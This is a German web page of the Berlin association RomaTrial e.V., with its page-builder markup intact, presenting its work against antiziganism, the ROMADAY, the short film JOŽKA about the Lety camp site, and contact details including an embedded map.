Roma und Sinti, Europas größte Minderheit, werden auf dem gesamten Kontinent aufgrund jahrhundertealter Vorurteile ausgegrenzt und benachteiligt. Deswegen haben wir 2015 gemeinsam mit der Stiftung Denkmal für die ermordeten Juden Europas das Bündnis für Solidarität mit den Sinti und Roma Europas ins Leben gerufen. Das Bündnis vereint aktuell 25 Organisationen im Kampf gegen Antiziganismus und veranstaltet seit 2016 den ROMADAY, den Internationalen Tag der Roma.

[/fusion_text][fusion_button link=”https://romaday.org/” text_transform=”uppercase” target=”_blank” alignment=”left” hide_on_mobile=”small-visibility,medium-visibility,large-visibility” color=”custom” button_gradient_top_color=”#67002d” button_gradient_bottom_color=”#67002d” button_gradient_top_color_hover=”#231f20″ button_gradient_bottom_color_hover=”#231f20″ accent_color=”#fdfdff” accent_hover_color=”#fdfdff” stretch=”default” icon_position=”left” icon_divider=”no” animation_direction=”left” animation_speed=”0.3″ border_color=”#fdfdff” border_hover_color=”#fdfdff” border_radius_top_left=”0px” border_radius_top_right=”0px” border_radius_bottom_right=”0px” border_radius_bottom_left=”0px”]Mehr erfahren[/fusion_button][/fusion_builder_column][fusion_builder_column type=”1_3″ type=”1_3″ layout=”1_3″ center_content=”no” target=”_self” hide_on_mobile=”small-visibility,medium-visibility,large-visibility” background_image=”http://test.romatrial.org/wp-content/uploads/2018/06/roma_day_deutschland_logo-1.png” background_position=”left top” background_repeat=”no-repeat” hover_type=”zoomin” border_style=”solid” border_position=”all” animation_type=”zoom” animation_direction=”static” animation_speed=”0.3″ last=”true” element_content=”” border_sizes_top=”30px” border_sizes_bottom=”30px” border_sizes_left=”30px” border_sizes_right=”30px” first=”false” min_height=”” link=””][/fusion_builder_column][/fusion_builder_row][/fusion_builder_container][fusion_builder_container hundred_percent=”no” hundred_percent_height=”no” hundred_percent_height_scroll=”no” hundred_percent_height_center_content=”yes” equal_height_columns=”no” hide_on_mobile=”small-visibility,medium-visibility,large-visibility” background_position=”center center” background_repeat=”no-repeat” fade=”no” background_parallax=”none” enable_mobile=”no” parallax_speed=”0.3″ video_aspect_ratio=”16:9″ video_loop=”yes” video_mute=”yes” border_style=”solid” flex_column_spacing=”0px” type=”legacy”][fusion_builder_row][fusion_builder_column type=”1_1″ type=”1_1″ layout=”1_1″ center_content=”no” target=”_self” hide_on_mobile=”small-visibility,medium-visibility,large-visibility” background_position=”left top” background_repeat=”no-repeat” hover_type=”none” border_style=”solid” border_position=”all” margin_top=”-5px” animation_type=”slide” animation_direction=”right” animation_speed=”0.3″ last=”true” border_sizes_top=”0px” border_sizes_bottom=”0px” border_sizes_left=”0px” border_sizes_right=”0px” first=”true” min_height=”” link=””][fusion_section_separator divider_type=”slant” divider_position=”left” divider_candy=”top” backgroundcolor=”#b9e0f2″ hide_on_mobile=”small-visibility,medium-visibility,large-visibility” /][/fusion_builder_column][/fusion_builder_row][/fusion_builder_container][fusion_builder_container admin_label=”JOZKA” hundred_percent=”no” hundred_percent_height=”no” hundred_percent_height_scroll=”no” hundred_percent_height_center_content=”yes” equal_height_columns=”no” hide_on_mobile=”no” background_image=”http://romatrial.org/wp-content/uploads/2019/10/Jozka_innenbild.jpg” background_position=”center center” background_repeat=”no-repeat” fade=”no” background_parallax=”left” enable_mobile=”no” parallax_speed=”0.7″ video_aspect_ratio=”16:9″ video_loop=”yes” video_mute=”yes” border_style=”solid” padding_top=”160px” padding_bottom=”160px” border_sizes_top=”0px” border_sizes_bottom=”0px” border_sizes_left=”0px” border_sizes_right=”0px” type=”legacy”][fusion_builder_row][fusion_builder_column type=”1_6″ type=”1_6″ layout=”1_6″ last=”false” spacing=”yes” center_content=”no” hide_on_mobile=”yes” background_repeat=”no-repeat” background_position=”left top” hover_type=”none” border_position=”all” border_style=”solid” animation_type=”0″ animation_direction=”down” animation_speed=”0.1″ border_sizes_top=”0px” border_sizes_bottom=”0px” border_sizes_left=”0px” border_sizes_right=”0px” first=”true” spacing_right=”2%” min_height=”” link=””][fusion_separator style_type=”none” alignment=”center” /][/fusion_builder_column][fusion_builder_column type=”2_3″ type=”2_3″ layout=”2_3″ spacing=”yes” center_content=”no” link=”http://romatrial.org/projekte/jozka/” target=”_self” hide_on_mobile=”no” background_color=”rgba(253,253,255,0.65)” background_position=”left top” background_repeat=”no-repeat” hover_type=”none” border_style=”solid” border_position=”all” padding_top=”40px” padding_right=”40px” padding_bottom=”40px” padding_left=”40px” animation_type=”slide” animation_direction=”right” animation_speed=”0.2″ last=”false” border_sizes_top=”0px” border_sizes_bottom=”0px” border_sizes_left=”0px” border_sizes_right=”0px” first=”false” spacing_right=”2%” spacing_left=”2%” min_height=””][fusion_title hide_on_mobile=”small-visibility,medium-visibility,large-visibility” size=”6″ content_align=”center” style_type=”underline solid” sep_color=”#231f20″]

KURZFILM JOŽKA

[/fusion_title][fusion_text rule_style=”default”]

Seitdem seine Gesundheit durch lebenslange Arbeit im Bergbau zerstört wurde, widmet sich JOŽKA unermüdlich dem Kampf für eine bessere, gerechtere Gesellschaft und gegen die kontinuierliche Diskriminierung von Roma in Tschechien, die die Schweinemastanlage am Ort des ehemaligen Roma-KZ Lety verkörpert.

[/fusion_text][fusion_button link=”http://romatrial.org/projekte/jozka/” target=”_self” alignment=”center” hide_on_mobile=”small-visibility,medium-visibility,large-visibility” color=”default” button_gradient_top_color=”008FD2″ button_gradient_bottom_color=”008FD2″ button_gradient_top_color_hover=”#fdfdff” button_gradient_bottom_color_hover=”#fdfdff” accent_hover_color=”#231f20″ size=”small” stretch=”default” icon_position=”left” icon_divider=”no” animation_direction=”left” animation_speed=”0.3″ border_hover_color=”#231f20″]Mehr erfahren[/fusion_button][/fusion_builder_column][fusion_builder_column type=”1_6″ type=”1_6″ layout=”1_6″ last=”true” spacing=”yes” center_content=”no” hide_on_mobile=”yes” background_repeat=”no-repeat” background_position=”left top” hover_type=”none” border_position=”all” border_style=”solid” animation_type=”0″ animation_direction=”down” animation_speed=”0.1″ border_sizes_top=”0px” border_sizes_bottom=”0px” border_sizes_left=”0px” border_sizes_right=”0px” first=”false” spacing_left=”2%” min_height=”” link=””][fusion_separator style_type=”none” alignment=”center” /][/fusion_builder_column][/fusion_builder_row][/fusion_builder_container][fusion_builder_container admin_label=”Newsletter” hundred_percent=”no” hundred_percent_height=”yes” hundred_percent_height_scroll=”no” hundred_percent_height_center_content=”yes” equal_height_columns=”no” hide_on_mobile=”small-visibility,medium-visibility,large-visibility” background_position=”center center” background_repeat=”no-repeat” fade=”no” background_parallax=”none” enable_mobile=”no” parallax_speed=”0.3″ video_aspect_ratio=”16:9″ video_loop=”yes” video_mute=”yes” border_style=”solid” align_content=”center” flex_column_spacing=”0px” type=”legacy”][fusion_builder_row][fusion_builder_column type=”1_1″ type=”1_1″ layout=”1_1″ center_content=”no” target=”_self” hide_on_mobile=”small-visibility,medium-visibility,large-visibility” background_position=”left top” background_repeat=”no-repeat” hover_type=”none” border_style=”solid” border_position=”all” animation_type=”slide” animation_direction=”right” animation_speed=”0.3″ last=”true” border_sizes_top=”0px” border_sizes_bottom=”0px” border_sizes_left=”0px” border_sizes_right=”0px” first=”true” min_height=”” link=””][rev_slider alias=”romatrial_newsletter_en” /][/fusion_builder_column][/fusion_builder_row][/fusion_builder_container][fusion_builder_container hundred_percent=”no” hundred_percent_height=”no” hundred_percent_height_scroll=”no” hundred_percent_height_center_content=”yes” equal_height_columns=”no” hide_on_mobile=”small-visibility,medium-visibility,large-visibility” background_position=”center center” background_repeat=”no-repeat” fade=”no” background_parallax=”none” enable_mobile=”no” parallax_speed=”0.3″ video_aspect_ratio=”16:9″ video_loop=”yes” video_mute=”yes” border_style=”solid” type=”legacy”][fusion_builder_row][fusion_builder_column type=”1_2″ type=”1_2″ layout=”1_2″ center_content=”no” target=”_self” hide_on_mobile=”small-visibility,medium-visibility,large-visibility” background_position=”left top” background_repeat=”no-repeat” hover_type=”none” border_style=”solid” border_position=”all” animation_type=”slide” animation_direction=”left” animation_speed=”0.3″ last=”false” border_sizes_top=”0px” border_sizes_bottom=”0px” border_sizes_left=”0px” border_sizes_right=”0px” first=”true” min_height=”” link=””][fusion_button link=”https://facebook.com/romatrial.org” target=”_blank” hide_on_mobile=”small-visibility,medium-visibility,large-visibility” color=”custom” button_gradient_top_color=”#008fd2″ button_gradient_bottom_color=”#008fd2″ button_gradient_top_color_hover=”#2e66ab” button_gradient_bottom_color_hover=”#2e66ab” accent_color=”#ffffff” accent_hover_color=”#ffffff” stretch=”default” icon=”fa-facebook-f fab” icon_position=”left” icon_divider=”no” animation_direction=”left” animation_speed=”0.3″ border_color=”#ffffff” border_hover_color=”#ffffff”]RomaTrial auf Facebook[/fusion_button][/fusion_builder_column][fusion_builder_column type=”1_2″ type=”1_2″ layout=”1_2″ center_content=”no” target=”_self” hide_on_mobile=”small-visibility,medium-visibility,large-visibility” background_position=”left top” background_repeat=”no-repeat” hover_type=”none” border_style=”solid” border_position=”all” animation_type=”slide” animation_direction=”right” animation_speed=”0.3″ last=”true” border_sizes_top=”0px” border_sizes_bottom=”0px” border_sizes_left=”0px” border_sizes_right=”0px” first=”false” min_height=”” link=””][fusion_button link=”https://twitter.com/romatrial_org” text_transform=”uppercase” target=”_blank” hide_on_mobile=”small-visibility,medium-visibility,large-visibility” color=”custom” button_gradient_top_color=”#73c1e6″ button_gradient_bottom_color=”#73c1e6″ button_gradient_top_color_hover=”#05a2f2″ button_gradient_bottom_color_hover=”#05a2f2″ accent_color=”#ffffff” accent_hover_color=”#ffffff” stretch=”default” icon=”fa-twitter fab” icon_position=”left” icon_divider=”no” animation_direction=”left” animation_speed=”0.3″ border_color=”#ffffff” border_hover_color=”#ffffff”]RomaTrial auf Twitter[/fusion_button][/fusion_builder_column][/fusion_builder_row][/fusion_builder_container][fusion_builder_container admin_label=”RomaTrial e.V. Name + Definition” hundred_percent=”no” hundred_percent_height=”no” hundred_percent_height_scroll=”no” hundred_percent_height_center_content=”yes” equal_height_columns=”no” hide_on_mobile=”small-visibility,medium-visibility,large-visibility” background_color=”#fdfdff” background_position=”center center” background_repeat=”no-repeat” fade=”no” background_parallax=”none” enable_mobile=”no” parallax_speed=”0.3″ video_aspect_ratio=”16:9″ video_loop=”yes” video_mute=”yes” border_style=”solid” flex_column_spacing=”0px” type=”legacy”][fusion_builder_row][fusion_builder_column type=”1_1″ type=”1_1″ layout=”1_1″ center_content=”yes” target=”_self” hide_on_mobile=”small-visibility,medium-visibility,large-visibility” background_position=”left top” background_repeat=”no-repeat” hover_type=”none” border_style=”solid” border_position=”all” animation_type=”fade” animation_direction=”static” animation_speed=”0.3″ last=”true” align_content=”center” border_sizes_top=”0px” border_sizes_bottom=”0px” border_sizes_left=”0px” border_sizes_right=”0px” first=”true” min_height=”” link=””][fusion_title hide_on_mobile=”small-visibility,medium-visibility,large-visibility” size=”6″ content_align=”center” style_type=”underline solid” sep_color=”#000000″]

RomaTrial e.V.

Transkulturelle Selbsorganisation von Roma und Nicht-Roma

[/fusion_title][/fusion_builder_column][/fusion_builder_row][/fusion_builder_container][fusion_builder_container hundred_percent=”no” hundred_percent_height=”no” hundred_percent_height_scroll=”no” hundred_percent_height_center_content=”yes” equal_height_columns=”no” hide_on_mobile=”small-visibility,medium-visibility,large-visibility” background_image=”http://test.romatrial.org/wp-content/uploads/2018/06/romatrial_transparent_white_backgrounds_for_logo_kontakt.png” background_position=”center center” background_repeat=”no-repeat” fade=”no” background_parallax=”left” enable_mobile=”no” parallax_speed=”0.7″ video_aspect_ratio=”16:9″ video_loop=”yes” video_mute=”yes” border_style=”solid” type=”legacy”][fusion_builder_row][fusion_builder_column type=”1_2″ type=”1_2″ layout=”1_2″ center_content=”no” target=”_self” hide_on_mobile=”small-visibility,medium-visibility,large-visibility” background_position=”left top” background_repeat=”no-repeat” hover_type=”none” border_style=”solid” border_position=”all” animation_type=”slide” animation_direction=”left” animation_speed=”0.5″ last=”false” border_sizes_top=”0px” border_sizes_bottom=”0px” border_sizes_left=”0px” border_sizes_right=”0px” first=”true” min_height=”” link=””][fusion_text rule_style=”default”]

Nehmen Sie Kontakt mit dem RomaTrial-Team auf

[/fusion_text][fusion_separator style_type=”default” hide_on_mobile=”small-visibility,medium-visibility,large-visibility” top_margin=”-25px” border_size=”0″ alignment=”center” /][fusion_text rule_style=”default”]

Senden Sie uns eine Nachricht.

[/fusion_text][fusion_separator style_type=”default” hide_on_mobile=”small-visibility,medium-visibility,large-visibility” top_margin=”15px” border_size=”0″ alignment=”center” /][fusion_text rule_style=”default”]

[contact-form-7 id=”13390″ title=”Kontaktformular Small EN”][/fusion_text][/fusion_builder_column][fusion_builder_column type=”1_2″ type=”1_2″ layout=”1_2″ center_content=”no” target=”_self” hide_on_mobile=”small-visibility,medium-visibility,large-visibility” background_position=”left top” background_repeat=”no-repeat” hover_type=”none” border_style=”solid” border_position=”all” animation_type=”slide” animation_direction=”right” animation_speed=”0.5″ last=”true” border_sizes_top=”0px” border_sizes_bottom=”0px” border_sizes_left=”0px” border_sizes_right=”0px” first=”false” min_height=”” link=””][fusion_code]PGlmcmFtZSBzdHlsZT0iYm9yZGVyOiAwOyIgc3JjPSJodHRwczovL3d3dy5nb29nbGUuY29tL21hcHMvZW1iZWQ/cGI9ITFtMTghMW0xMiExbTMhMWQ2MDYuODQxNzMyNDY2NjI2NyEyZDEzLjQxMjU2MTE3NzY0NjQ3NyEzZDUyLjUyNjc5NTA1MDUyNjc0ITJtMyExZjAhMmYwITNmMCEzbTIhMWkxMDI0ITJpNzY4ITRmMTMuMSEzbTMhMW0yITFzMHg0N2E4NGUxZGNjZmVhOGM1JTNBMHhkNWRkNmJiYmJlNjNhNjRlITJzV2V5ZGluZ2Vyc3RyYSVDMyU5RmUlMjAxNC0xNiUyQyUyMDEwMTc4JTIwQmVybGluITVlMCEzbTIhMXNkZSEyc2RlITR2MTU2OTIzODc0MTM0NSE1bTIhMXNkZSEyc2RlIiB3aWR0aD0iMTAwJSIgaGVpZ2h0PSIzMDAiIGZyYW1lYm9yZGVyPSIwIiBhbGxvd2Z1bGxzY3JlZW49ImFsbG93ZnVsbHNjcmVlbiI+PC9pZnJhbWU+[/fusion_code][fusion_section_separator divider_type=”bigtriangle” divider_position=”center” divider_candy=”top” backgroundcolor=”#EBEAEA” hide_on_mobile=”small-visibility,medium-visibility,large-visibility” /][fusion_content_boxes layout=”clean-horizontal” columns=”1″ link_area=”link-icon” icon_align=”left” animation_direction=”left” animation_speed=”0.3″ hide_on_mobile=”small-visibility,medium-visibility,large-visibility” heading_size=”2″ backgroundcolor=”#ebeaea” iconspin=”no” iconcolor=”#0a0a0a” icon_circle=”no” icon_size=”50″ icon_hover_type=”none” margin_top=”0px” margin_bottom=”0px”][fusion_content_box title=”Unsere Adresse” icon=”fa-address-card fas” animation_direction=”left” animation_speed=”0.3″]

Weydingerstraße 14-16, 10178 Berlin, Germany

[/fusion_content_box][fusion_content_box title=”E-Mail” icon=”fa-at fas” iconspin=”no” linktext=”Read More” animation_direction=”left” animation_speed=”0.3″]

post@romatrial.org

[/fusion_content_box][/fusion_content_boxes][fusion_social_links facebook=”https://www.facebook.com/RomaTrial.org/” instagram=”https://www.instagram.com/romatrial/” vimeo=”https://vimeo.com/romatrial” youtube=”https://www.youtube.com/channel/UCEF_mPwMXkcqUvfgxv-AD7A” email=”post@romatrial.org” show_custom=”no” alignment=”center” hide_on_mobile=”small-visibility,medium-visibility,large-visibility” /][/fusion_builder_column][fusion_builder_column type=”1_2″ type=”1_2″ layout=”1_2″ center_content=”no” target=”_self” hide_on_mobile=”small-visibility,medium-visibility,large-visibility” background_position=”left top” background_repeat=”no-repeat” hover_type=”none” border_style=”solid” border_position=”all” animation_direction=”left” animation_speed=”0.3″ last=”true” element_content=”” border_sizes_top=”0px” border_sizes_bottom=”0px” border_sizes_left=”0px” border_sizes_right=”0px” first=”true” min_height=”” link=””][/fusion_builder_column][/fusion_builder_row][/fusion_builder_container]

Go to Top